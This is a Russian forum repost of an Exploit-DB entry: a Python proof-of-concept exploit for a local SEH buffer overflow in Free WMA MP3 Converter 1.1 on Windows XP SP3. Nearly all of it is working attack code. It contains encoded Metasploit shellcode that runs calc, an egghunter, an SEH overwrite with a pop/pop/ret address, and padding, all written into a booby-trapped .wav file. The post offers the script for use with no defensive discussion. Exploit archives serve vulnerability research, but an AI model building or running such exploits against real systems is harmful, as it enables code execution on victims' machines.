Exploit Free WMA MP3 Converter 1.1 - Local Buffer Overflow (SEH)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15499
Проверка EDB
  1. Пройдено
Автор
DR_IDE
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
null
Дата публикации
2010-11-12
Код:
#!/usr/bin/env python
##############################################################################
#
# Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Date:         November 10, 2010
# Download:     http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:    Windows XPSP3
# Greets:       edb team
# Notes:	Egghunter was for fun, not required though.
#
###############################################################################

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# Egg is already injected
code=(
"\x80\x87\x78\x68\x80\x87\x78\x68\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
"\x4a\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51"
"\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50"
"\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x50"
"\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49"
"\x50\x42\x54\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47"
"\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45"
"\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51"
"\x4c\x46\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50\x56\x42"
"\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45"
"\x4c\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42"
"\x4a\x50\x50\x43\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43\x51\x42\x4c\x42"
"\x43\x43\x30\x41\x41")

eggy=(
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x80\x87\x78\x68\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

nops=("\x90" * 8)
nseh=("\xEB\x06\x90\x90")
rseh=("\xEF\xF7\x4A\x00")			#Universal P/P/R - Wmpcon.exe		
buf1=("\x41" * 1000)
buf2=("\x42" * (4116 - len(buf1+nops+code)))
junk=("\x43" * (8000 - len(buf1+buf2+nseh+rseh)))

evil=(buf1+nops+code+buf2+nseh+rseh+nops+eggy+junk);

f1 = open('Dr_IDE.wav','w');
f1.write(evil);
f1.close();

#[http://pocoftehday.blogspot.com]
 
Источник
www.exploit-db.com

Похожие темы